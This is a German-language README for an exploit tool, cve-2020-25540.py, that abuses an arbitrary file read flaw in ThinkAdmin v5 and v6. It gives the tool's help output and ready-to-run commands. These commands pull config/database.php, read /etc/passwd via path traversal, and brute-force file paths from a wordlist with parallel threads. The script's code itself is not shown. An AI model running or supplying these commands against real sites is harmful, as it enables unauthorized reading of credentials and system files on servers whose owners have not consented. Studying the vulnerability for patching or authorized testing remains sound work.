
ThinkAdmin v5 v6 – Ausnutzung von Schwachstellen zum Lesen beliebiger Dateien, mit anpassbarem Wörterbuch-Brute-Force
Dieses Skript dient dazu, die Schwachstelle für beliebiges Dateilesen (Arbitrary File Read) in ThinkAdmin v5 und v6 auszunutzen.
==Die Schnittstellenpfade können je nach Version unterschiedlich sein (einige basieren auf einer Weiterentwicklung des ursprünglichen ThinkAdmin)==
Grundlegende Verwendung
usage: cve-2020-25540.py [-h] -t TARGET [-f FILE] [-w WORDLIST] [-b BASE_PATH]
[-p PARALLEL]
Dateien über die API lesen und Antworten abrufen
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Ziel-IP-Adresse oder Domain
-f FILE, --file FILE Pfad der zu lesenden Datei
-w WORDLIST, --wordlist WORDLIST
Pfad zur Wörterbuchdatei, mehrere Dateipfade oder Dateinamen angeben
-b BASE_PATH, --base-path BASE_PATH
Basispfad zum Kombinieren der Pfade aus der Wörterbuchdatei
-p PARALLEL, --parallel PARALLEL
Anzahl paralleler Threads
python3 cve-2020-25540.py -t "https://xxx.xx" -f "config/database.php"
python3 cve-2020-25540.py -t "https://xxx.xx" -f "../../../etc/passwd"
python3 cve-2020-25540.py -t "https://xxx.xx" -b "../../../etc/" -w wordlist.txt -p 10